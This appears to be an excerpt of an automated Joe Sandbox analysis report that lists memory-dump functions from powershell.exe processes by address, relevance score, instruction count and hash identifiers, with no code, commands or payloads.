                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                • String ID:
                                                                • API String ID: 132034935-0
                                                                • Opcode ID: cb9dd0156ae4fb5f79da8a18dda23736e7ec751a528f1d166b579600b51afd71
                                                                • Instruction ID: 87ff1c25499b135e6efca223b15b6754d34c0fe56b694882b0ed4b84e4e51098
                                                                • Opcode Fuzzy Hash: cb9dd0156ae4fb5f79da8a18dda23736e7ec751a528f1d166b579600b51afd71
                                                                • Instruction Fuzzy Hash: 0C2147B5900249DFCB10DF9AC884BDEBBF4FF48320F148429E929A7240D738A955CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C7A5E8, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 869 c7a5e8-c7a628 ShowOwnedPopups
                                                                APIs
                                                                • ShowOwnedPopups.USER32(?,?,?,?,00000000,?,?,?), ref: 00C7A620
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID: OwnedPopupsShow
                                                                • String ID:
                                                                • API String ID: 1275925010-0
                                                                • Opcode ID: 75529c606176c4b0f75b60d4d54a8b4708c058b4bb1a3bb2652b55570f586eda
                                                                • Instruction ID: b447715f83d0f233ac1591d3422f6bc573241bd7ea57fd837fbf65c6eb7648c4
                                                                • Opcode Fuzzy Hash: 75529c606176c4b0f75b60d4d54a8b4708c058b4bb1a3bb2652b55570f586eda
                                                                • Instruction Fuzzy Hash: 19F0C976904149BF9F02CEA09C01CAB3FBAEB58340B1585A6B914C6122E2328A35BB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C7A5F8, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 870 c7a5f8-c7a628 ShowOwnedPopups
                                                                APIs
                                                                • ShowOwnedPopups.USER32(?,?,?,?,00000000,?,?,?), ref: 00C7A620
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID: OwnedPopupsShow
                                                                • String ID:
                                                                • API String ID: 1275925010-0
                                                                • Opcode ID: 4209189a6aaae0249e0feccff56d73a5df1160dedc45bbae11e54244448b2e6f
                                                                • Instruction ID: 7b8d1628002221249902ebd943c88a44899be2f1a1f515f26ddffe3107312023
                                                                • Opcode Fuzzy Hash: 4209189a6aaae0249e0feccff56d73a5df1160dedc45bbae11e54244448b2e6f
                                                                • Instruction Fuzzy Hash: 98E0927290010DFF9F01DEA19D01CAF7BBAEB48240B00C465BA0492121E6329A31BBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFC7C8, Relevance: .4, Instructions: 399COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfff5877ef82b522bb8fc123c25a440fc5247f395ced1e7b85333a832c7087cc
                                                                • Instruction ID: 5e846297de58aa95522c54d09a09b2f478941b83d862ba30163fd8b30875f82b
                                                                • Opcode Fuzzy Hash: dfff5877ef82b522bb8fc123c25a440fc5247f395ced1e7b85333a832c7087cc
                                                                • Instruction Fuzzy Hash: 99F18270A0020DDFCB14DFA4C980AAEBBB6FF88304F348569D609AB355DB75AD45CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFEB30, Relevance: .3, Instructions: 313COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d95889f42aa20ee5825f8c4792d5b5b23bab8a9f6c11a2f9a8f2595f0ff8a33d
                                                                • Instruction ID: 188354a408b7805df92195ac7ff34202f542c15b77a2d2928b5f1727f159b072
                                                                • Opcode Fuzzy Hash: d95889f42aa20ee5825f8c4792d5b5b23bab8a9f6c11a2f9a8f2595f0ff8a33d
                                                                • Instruction Fuzzy Hash: 2EB1B2747002599FCB14DB68D890A6EBBB6FF89304F148569E5069B3A1DB30FC05CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFD6F0, Relevance: .3, Instructions: 299COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 745a24594c9e7063e03c83cf1759e537fb83f5c292a45027e8c67d7d42c014dd
                                                                • Instruction ID: f5d237d092244d6d38588dfd9a27b025e8d8382d5c6faecdc1fa23efb0bb4c04
                                                                • Opcode Fuzzy Hash: 745a24594c9e7063e03c83cf1759e537fb83f5c292a45027e8c67d7d42c014dd
                                                                • Instruction Fuzzy Hash: 98D10834A04219CFDB24DF64CD94BADBBB2BF89304F2481A9D509AB395DB719D82CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFDC08, Relevance: .3, Instructions: 277COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b4c8e8e7cd85a96b1b679840933a74c2c6514457fd98baa6a4e6dd97039fb76
                                                                • Instruction ID: cdad5e7ead201ba38ebd84e93e95223bb84c4f07c35bd6590f4324dd7c9a1d1d
                                                                • Opcode Fuzzy Hash: 3b4c8e8e7cd85a96b1b679840933a74c2c6514457fd98baa6a4e6dd97039fb76
                                                                • Instruction Fuzzy Hash: 17B18235B002188FCB14EFA4D954AADBBF3FF89304F648968D906AB394DF359D058B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFAC00, Relevance: .3, Instructions: 252COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cecd509563c96f5bd768ecc60fb0c0d51b1e2a41d1a674695a7f18bcc510ac7
                                                                • Instruction ID: 54930bd460173f0dc13f2eebaca61cb31c45dd44b74fcfee7f3a7177f9838f10
                                                                • Opcode Fuzzy Hash: 3cecd509563c96f5bd768ecc60fb0c0d51b1e2a41d1a674695a7f18bcc510ac7
                                                                • Instruction Fuzzy Hash: 408102797002184FCB149B74D85577A7AA3EFC9314F288479EA0ADB391CF399C0297A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFD6E1, Relevance: .2, Instructions: 151COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92ea859e185d7b8257a146d89498a58e1b3e61e0de29a201860f306737312463
                                                                • Instruction ID: 4bf4c9a61fe38a82fc0480e52ced98a6f50af670bdfb0ab421187b64758b6a2d
                                                                • Opcode Fuzzy Hash: 92ea859e185d7b8257a146d89498a58e1b3e61e0de29a201860f306737312463
                                                                • Instruction Fuzzy Hash: 41516A34A042598FDB24DF64C950BADBBF2BF88304F2481A9D509EB391DB319D42CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFB220, Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 229e6d54e27978adbbe29c237737d0c02a337a8164129c0d4bdd49ddb0a60abe
                                                                • Instruction ID: d9caa66a15ad998d326279f3f4d37bd8869ede46c960ed6916cb919e686ddc7f
                                                                • Opcode Fuzzy Hash: 229e6d54e27978adbbe29c237737d0c02a337a8164129c0d4bdd49ddb0a60abe
                                                                • Instruction Fuzzy Hash: 3D419074A01218DFCB04EFA4E8949ADBBB2FFC9314F148569E905AB350DB35AD05CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFCCCE, Relevance: .1, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 69297de58273cf600705512442e0f094e3efbcc0b929073f82621c8838828a84
                                                                • Instruction ID: d35d0cfa6825a98a2481bbf004cf1078cf2a5a573b366ea3d94810d5972bfe65
                                                                • Opcode Fuzzy Hash: 69297de58273cf600705512442e0f094e3efbcc0b929073f82621c8838828a84
                                                                • Instruction Fuzzy Hash: EF512774A002089FDB14DF94C985BAEBBF2EF88304F349468E509AB3A5DB75AC41CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFB21B, Relevance: .1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f3d6016f2274708b9357109217d82bdaeb17bca4d096ea319acfc5618ea0823
                                                                • Instruction ID: b768e05626fd64262f2f1be14116b179b64ee1fe63a5d34b6ec19bf4ebbd7c80
                                                                • Opcode Fuzzy Hash: 3f3d6016f2274708b9357109217d82bdaeb17bca4d096ea319acfc5618ea0823
                                                                • Instruction Fuzzy Hash: E7318174A01224DFCB08EF68E4948ADB7B6FFC9315B508569E806AB350DF35AD06CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFB144, Relevance: .1, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18e6ccad6260a5e27dff276ecbef4699748865f2ab273cafaefcd839ff4a2d2b
                                                                • Instruction ID: 71696529fae9fe5eca3a8f4c2901a05b9c95d160c44b51259495a72b6f4953ad
                                                                • Opcode Fuzzy Hash: 18e6ccad6260a5e27dff276ecbef4699748865f2ab273cafaefcd839ff4a2d2b
                                                                • Instruction Fuzzy Hash: 712144357052488FCB069B78D4248B9BBB3AFC631071885AAD485CB262DB30CC86CB81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFDFE0, Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb10231b812f59bc144b5c39438bfacc29728d594d4c8c402fc54f2295504cad
                                                                • Instruction ID: 22f7bf67df101a205a8c2a2165415b425efeade0b4de1ec73264d85ecbec2549
                                                                • Opcode Fuzzy Hash: cb10231b812f59bc144b5c39438bfacc29728d594d4c8c402fc54f2295504cad
                                                                • Instruction Fuzzy Hash: 3B2108347041584FCB06E778D81063EBBB7DFC6348BA548A9D14ADB392DF28AC0187A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFEA08, Relevance: .1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c0fa5f62ec56e444356722bd21d71d78d03cc9e60e7b6b01efd7aeea2b6e3c1
                                                                • Instruction ID: 22ddc72dfe129d95943e148ae00e3bab2b59a09651cbbf50e7bc9632196b9460
                                                                • Opcode Fuzzy Hash: 2c0fa5f62ec56e444356722bd21d71d78d03cc9e60e7b6b01efd7aeea2b6e3c1
                                                                • Instruction Fuzzy Hash: 0C216F71700508DFCB14EF65D959BAEB7B6EB88311F2040A9E606E73A0DF76AD40CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFE110, Relevance: .1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc7a6402c20e528228b3596dd30fb0d91b7d80177ef14c8b700ef153e6757475
                                                                • Instruction ID: 4b18df11b38b92ece035f89873528ff46a6b208ffe4de073a048f4adad0af576
                                                                • Opcode Fuzzy Hash: cc7a6402c20e528228b3596dd30fb0d91b7d80177ef14c8b700ef153e6757475
                                                                • Instruction Fuzzy Hash: 9911A330B097589FC715D76A980072EBBE69F86718F15C4AAD109EB3A2CB34AC01CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFE331, Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ea2e2255dfffd46a1cda1908b608f04af43622fd083523da15687a391359a0e
                                                                • Instruction ID: be8aa701bbb29f2914b2e6c988370dd28a0b80180bed539b08cb6a4af78f97e4
                                                                • Opcode Fuzzy Hash: 4ea2e2255dfffd46a1cda1908b608f04af43622fd083523da15687a391359a0e
                                                                • Instruction Fuzzy Hash: C401D671E09748AFD714DB65D408B6ABBF0DF85310F05C0AADA19DB361D634A941CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFEB20, Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 077d35de6960bc67ef65a9292f55cb9547b4d764ac44c61c16a850bae78c5102
                                                                • Instruction ID: 1959e98549bd8649648fe3ecaff37aff8fbcf4efb35e6e94e87af10a0dbbfe6e
                                                                • Opcode Fuzzy Hash: 077d35de6960bc67ef65a9292f55cb9547b4d764ac44c61c16a850bae78c5102
                                                                • Instruction Fuzzy Hash: FF018C72208619ABC310DF58D880D9AFBEAFB893507018126E61AD7751D720EC118BE4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F2D01D, Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429630296.0000000000F2D000.00000040.00000001.sdmp, Offset: 00F2D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_f2d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45eeb42a74f94fad1d5be5ad2647dd61203f5c601cb22cfde31184384de405d8
                                                                • Instruction ID: 6506fd666f22c8c46fa894ae2e7976465273abef276a45ae2e07100a8b186628
                                                                • Opcode Fuzzy Hash: 45eeb42a74f94fad1d5be5ad2647dd61203f5c601cb22cfde31184384de405d8
                                                                • Instruction Fuzzy Hash: 9D01F771808364DEE7108A25EC84B66BB88EF45338F18801AED055B29AC3799805E6F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F2D005, Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429630296.0000000000F2D000.00000040.00000001.sdmp, Offset: 00F2D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_f2d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9960fb7c9647b7a52946d77eaa896ddbae2c559234cadac24a8bc0b1364d9d27
                                                                • Instruction ID: 45e5b5bf59c9f205c8875cc158327c853556449b5f690fa84c7be1677da2b39e
                                                                • Opcode Fuzzy Hash: 9960fb7c9647b7a52946d77eaa896ddbae2c559234cadac24a8bc0b1364d9d27
                                                                • Instruction Fuzzy Hash: 5B014C6140E3D09FD7128B259C94B56BFB4EF43224F1981DBE9848F2A7C2695C48C7B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFDFDF, Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da321dc1ba4a5db13dcb33f224cd84ef320aa12d663fbd9d5b615d7032ecb83e
                                                                • Instruction ID: b310e5e4b570683b6ae65679f6f4869decc30307d5d343876dedec83ba120069
                                                                • Opcode Fuzzy Hash: da321dc1ba4a5db13dcb33f224cd84ef320aa12d663fbd9d5b615d7032ecb83e
                                                                • Instruction Fuzzy Hash: 3F01D674A041184FCB11DB68D850ABEBBF5EF85314F64406DE54AE7362DB71AC01CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFE100, Relevance: .0, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16f017dc02dadf35cc94c1afb29081020d89318009eb81df793b8b27f4dec4e1
                                                                • Instruction ID: 783e4c1d97acfee7df97af2b593fcce98a3600fb82ca61babfa9336a31a16d06
                                                                • Opcode Fuzzy Hash: 16f017dc02dadf35cc94c1afb29081020d89318009eb81df793b8b27f4dec4e1
                                                                • Instruction Fuzzy Hash: B101C830B092589FDB11CB6AD810B6ABBF2DF86714F15C0EAE549D7362CB35AC01CB10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFE330, Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e1cfbf9d23016639efadc3ab15f9297f825a789424d865e07bbef2304bc3d87
                                                                • Instruction ID: bfa15bf8e8cf14f9a84be72ba3186ddbd36237e634c692c63e2a70e1a0a9caad
                                                                • Opcode Fuzzy Hash: 9e1cfbf9d23016639efadc3ab15f9297f825a789424d865e07bbef2304bc3d87
                                                                • Instruction Fuzzy Hash: 7EF03A71E05618AFDB14CE5AD804A6AB7E5EFC8720F15C0BAEA09DB361DA34AD01CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFB491, Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6709f2871b43df1e6a251f85104c19964cf9f1c63128eb291b1d4621e98f9d5
                                                                • Instruction ID: df6ef9f837f37a5275bb39d69c971b2522a9f064b3b165de9658d27054baf944
                                                                • Opcode Fuzzy Hash: e6709f2871b43df1e6a251f85104c19964cf9f1c63128eb291b1d4621e98f9d5
                                                                • Instruction Fuzzy Hash: 1FE068B1305B482BE3220196E5043117B998FC2728F2808AEDB98C3667E740DC4183A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00EFB4A0, Relevance: .0, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8202ce912546de770c00b75fd937f1e466639c6cb1fb9bc9617395750eaa1ed4
                                                                • Instruction ID: 5f60ebb0b66827dfd3dc18c996d4db77f066ffd01dced5217933debd4d8a9c04
                                                                • Opcode Fuzzy Hash: 8202ce912546de770c00b75fd937f1e466639c6cb1fb9bc9617395750eaa1ed4
                                                                • Instruction Fuzzy Hash: FAD05BA130071862E732119BD50076666CD4FC5B79F19147EEB68D3655E751EC4182E2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: powershell.exe PID: 4824 Parent PID: 2992 powershell.exeCOMMON

                                                                Executed Functions

                                                                Function 00F72CC8, Relevance: .4, Instructions: 366COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46513beb77ad91574dad7f78cf70b289035045f5c8843b35562424e5d15b0443
                                                                • Instruction ID: eb289852a88be113a139433bda5b03ab8a374d2740a41e41a773249b153c3917
                                                                • Opcode Fuzzy Hash: 46513beb77ad91574dad7f78cf70b289035045f5c8843b35562424e5d15b0443
                                                                • Instruction Fuzzy Hash: 6FE18234A00204DFCB55CF65D898AAEBBB2FF48310F64846AE9199B351CB35ED41DF62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F77798, Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: {T
                                                                • API String ID: 0-1157407052
                                                                • Opcode ID: 7b2c1e18f1488604dfa7e57083c777a8e6419571bc87cc34f55728b6c7d169e4
                                                                • Instruction ID: 40b225014b8e44d156c336b178a1838a433fa27d2f53f286d2bc9353a9741a6a
                                                                • Opcode Fuzzy Hash: 7b2c1e18f1488604dfa7e57083c777a8e6419571bc87cc34f55728b6c7d169e4
                                                                • Instruction Fuzzy Hash: 51817974A122049FCB14EFA8C584EADBBF2EF48310F25849AE945AB361D770ED01DF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F744F1, Relevance: .4, Instructions: 431COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1de3fc4510cfa596d2729cb5e907f79818909dd854b0e8c0f32843c0ba83c515
                                                                • Instruction ID: ad3077e5dec6d65f1e7eeb681adea79f691696cf23715626df09b7d0e84f343d
                                                                • Opcode Fuzzy Hash: 1de3fc4510cfa596d2729cb5e907f79818909dd854b0e8c0f32843c0ba83c515
                                                                • Instruction Fuzzy Hash: 98123C74A00218DFDB25DF64C894BA9B7B2FF49310F1481A9E909AB361CB34EE81DF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7E598, Relevance: .3, Instructions: 320COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c53e85c93653da8c5e30cb1b5bc71613eb7928a662d9b9d4b293da04ee0b5cc9
                                                                • Instruction ID: 2ff8f706d8e3dc7a6c2ad89da9669109d16268c7780baf648facc40fb4cb9a01
                                                                • Opcode Fuzzy Hash: c53e85c93653da8c5e30cb1b5bc71613eb7928a662d9b9d4b293da04ee0b5cc9
                                                                • Instruction Fuzzy Hash: 36B1CE3AE00510DFCB41EB19C450A6DFB73BF49310B5589A7D529AB660D732EC61EBC2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7E1D0, Relevance: .3, Instructions: 310COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa5df3dc5382c8e1b0da546493eab22e0b951c5a2b31af67a63996a3670937bb
                                                                • Instruction ID: 6938a8bd5b7ab9023e71719babde7be5981c85a1bac38a05dd96e09a5817efda
                                                                • Opcode Fuzzy Hash: fa5df3dc5382c8e1b0da546493eab22e0b951c5a2b31af67a63996a3670937bb
                                                                • Instruction Fuzzy Hash: F9B18039B002048FC714DF68D494AAEB7E2EFCD324F1484AAD90A9B351DB35EC41DB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F75400, Relevance: .3, Instructions: 270COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
